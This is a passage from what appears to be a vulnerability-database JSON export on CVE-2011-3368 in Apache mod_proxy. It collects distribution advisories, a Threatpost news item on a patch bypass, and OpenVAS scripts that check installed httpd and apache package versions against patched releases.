index.html with Oracle's index page\n- update vstring in specfile\n[2.2.15-9.3]\n- add security fixes for CVE-2011-3347, CVE-2011-3368 (#743901)\n- fix regressions in CVE-2011-3192 patch (#736592)", "edition": 4, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "ELSA-2011-1391", "href": "http://linux.oracle.com/errata/ELSA-2011-1391.html", "title": "httpd security and 
bug fix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:55", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368"], "description": "\nApache HTTP server project reports:\n\nAn exposure was found when using mod_proxy in reverse proxy mode.\n\t In certain configurations using RewriteRule with proxy flag, a\n\t remote attacker could cause the reverse proxy to connect to an\n\t arbitrary server, possibly disclosing sensitive information from\n\t internal web servers not directly accessible to attacker. There\n\t is no patch against this issue!\n\n", "edition": 4, "modified": "2011-10-05T00:00:00", "published": "2011-10-05T00:00:00", "id": "D8C901FF-0F0F-11E1-902B-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html", "title": "Apache 1.3 -- mod_proxy reverse proxy exposure", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:53", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "description": "\nCVE MITRE reports:\n\nAn exposure was found when using mod_proxy in reverse proxy\n\t mode. 
In certain configurations using RewriteRule with proxy\n\t flag or ProxyPassMatch, a remote attacker could cause the reverse\n\t proxy to connect to an arbitrary server, possibly disclosing\n\t sensitive information from internal web servers not directly\n\t accessible to attacker.\nInteger overflow in the ap_pregsub function in server/util.c in\n\t the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through\n\t 2.2.21, when the mod_setenvif module is enabled, allows local\n\t users to gain privileges via a .htaccess file with a crafted\n\t SetEnvIf directive, in conjunction with a crafted HTTP request\n\t header, leading to a heap-based buffer overflow.\nAn additional exposure was found when using mod_proxy in\n\t reverse proxy mode. In certain configurations using RewriteRule\n\t with proxy flag or ProxyPassMatch, a remote attacker could cause\n\t the reverse proxy to connect to an arbitrary server, possibly\n\t disclosing sensitive information from internal web servers\n\t not directly accessible to attacker.\nA flaw was found in mod_log_config. If the '%{cookiename}C' log\n\t format string is in use, a remote attacker could send a specific\n\t cookie causing a crash. This crash would only be a denial of\n\t service if using a threaded MPM.\nA flaw was found in the handling of the scoreboard. An\n\t unprivileged child process could cause the parent process to\n\t crash at shutdown rather than terminate cleanly.\nA flaw was found in the default error response for status code\n\t 400. 
This flaw could be used by an attacker to expose\n\t \"httpOnly\" cookies when no custom ErrorDocument is specified.\n\n", "edition": 4, "modified": "2011-10-05T00:00:00", "published": "2011-10-05T00:00:00", "id": "4B7DBFAB-4C6B-11E1-BC16-0023AE8E59F0", "href": "https://vuxml.freebsd.org/freebsd/4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0.html", "title": "apache -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T23:04:19", "bulletinFamily": "info", "cvelist": ["CVE-2011-3368"], "description": "[](<https://threatpost.com/new-apache-reverse-proxy-issue-uncovered-112611/>)A new reverse proxy issue affecting Apache HTTP server can be used by attackers to access internal systems if certain rules are improperly configured, a security researcher said.\n\nPrutha Parikh, vulnerability signature engineer at Qualys, blogged that she uncovered the issue while creating a QualysGuard vulnerability signature for another reverse proxy issue, detailed in CVE-2011-3368. While reviewing the patch for the older bug, she discovered it was still possible to use a crafted request to exploit a fully-patched Apache Web Server.\n\nIn the proof-of-concept demonstrations [detailed here in her blog post](<https://community.qualys.com/blogs/securitylabs/2011/11/23/apache-reverse-proxy-bypass-issue>), Parikh outlined two examples where an Apache Web Server (version 2.2.21) with the CVE-2011-3368 patch applied, a reverse proxy set up and incorrectly configured RewriteRule/ProxyPassMatch rules could be compromised by an attacker looking to circumvent security mechanisms.\n\n\u201cThe patch for CVE-2011-3368 is straight forward and self explanatory,\u201d she blogged. \u201cThe \u201cserver/protocol.c\u201d file was modified. 
The patch looks at the request being sent and returns a HTTP 400 Response (Bad Request) if the URL does not begin with a forward slash \u201c/\u201d.\u201d\n\n\u201cThis part of the code takes care of the issue for CVE-2011-3368,\u201d she continued.\n\nHowever, a closer analysis of the patch reveals it does not process URIs (uniform resource identifiers) that have a scheme, she added.\n\nAs a result, \u201cif a malformed URL request with a scheme was constructed, it would still be possible to bypass security and gain access to systems on the internal server provided that the reverse proxy rules were incorrectly configured,\u201d she wrote.\n\nApache developers are working on a [fix to address the issue](<http://mail-archives.apache.org/mod_mbox/httpd-dev/201111.mbox/%3c4ECF43AF.8060602@vodafone.com%3e>). \n", "modified": "2013-04-17T16:33:17", "published": "2011-11-26T23:41:49", "id": "THREATPOST:0413CB7CEB3A83FB6F02DBDDD013A75E", "href": "https://threatpost.com/new-apache-reverse-proxy-issue-uncovered-112611/75927/", "type": "threatpost", "title": "New Apache Reverse Proxy Issue Uncovered", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "description": "Oracle Linux Local Security Checks ELSA-2011-1392", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122067", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-1392", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1392.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This 
program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122067\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:31 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1392\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1392 - httpd security and bug fix update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1392\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1392.html\");\n script_cve_id(\"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "description": "The remote host is 
missing an update for the 'apache' package(s) announced via the referenced advisory.", "modified": "2018-11-16T00:00:00", "published": "2011-10-10T00:00:00", "id": "OPENVAS:1361412562310831460", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831460", "type": "openvas", "title": "Mandriva Update for apache MDVSA-2011:144 (apache)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2011:144 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-10/msg00017.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831460\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"MDVSA\", value:\"2011:144\");\n script_cve_id(\"CVE-2011-3368\");\n script_name(\"Mandriva Update for apache MDVSA-2011:144 (apache)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1|2009\\.0)\");\n script_tag(name:\"affected\", value:\"apache on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered and corrected in apache:\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x 
through 2.2.21 does not properly\n interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern\n matches for configuration of a reverse proxy, which allows remote\n attackers to send requests to intranet servers via a malformed URI\n containing an initial \\@ (at sign) character (CVE-2011-3368).\n\n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. The updated packages have been patched to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == 
\"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
